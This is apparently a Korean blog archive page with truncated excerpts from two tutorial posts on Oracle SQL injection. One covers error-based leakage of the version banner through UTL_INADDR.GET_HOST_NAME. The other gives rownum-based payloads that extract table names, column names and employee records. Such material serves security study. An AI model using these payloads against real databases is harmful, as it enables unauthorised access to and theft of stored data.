목록2020/04/18 (2)
Self-Improvement
Oracle 데이터베이스는 where 절을 할 시에는 무조건 '='와 대응되는 무언가가 있어야한다. UTL_INADDR.GET_HOST_NAME UTL_HTTP.REQUEST Oracle 11g 이상에선 ACL 정책 강화로 DBA 외에는 실행이 차단되어 Network 내장함수는 관리자 계정만 사용이 가능하다. system/system [기본 형식] > select UTL_INADDR.GET_HOST_NAME('127.0.0.1') from dual 문자열 쿼리를 주입하면 오류가 발생하지만 쿼리가 동작되어 출력이 이루어진다. [버전 정보 출력] > select UTL_INADDR.GET_HOST_NAME((select banner from v$version where rownum=1)) from dual ..
Oracle 데이터베이스는 where 절을 할 시에는 무조건 '='와 대응되는 무언가가 있어야한다. [테이블 추출] > select table_name from (select rownum as rownum1, table_name from tabs)t where t.rownum1=1 [칼럼 추출] > select column_name from(select rownum as rownum1, column_name from cols where table_name='EMPLOYEES')t where t.rownum1=2 [데이터 추출] > select Employee_ID, First_Name, Hire_Date from (select rownum as rownum1, Employee_ID, First_Name,..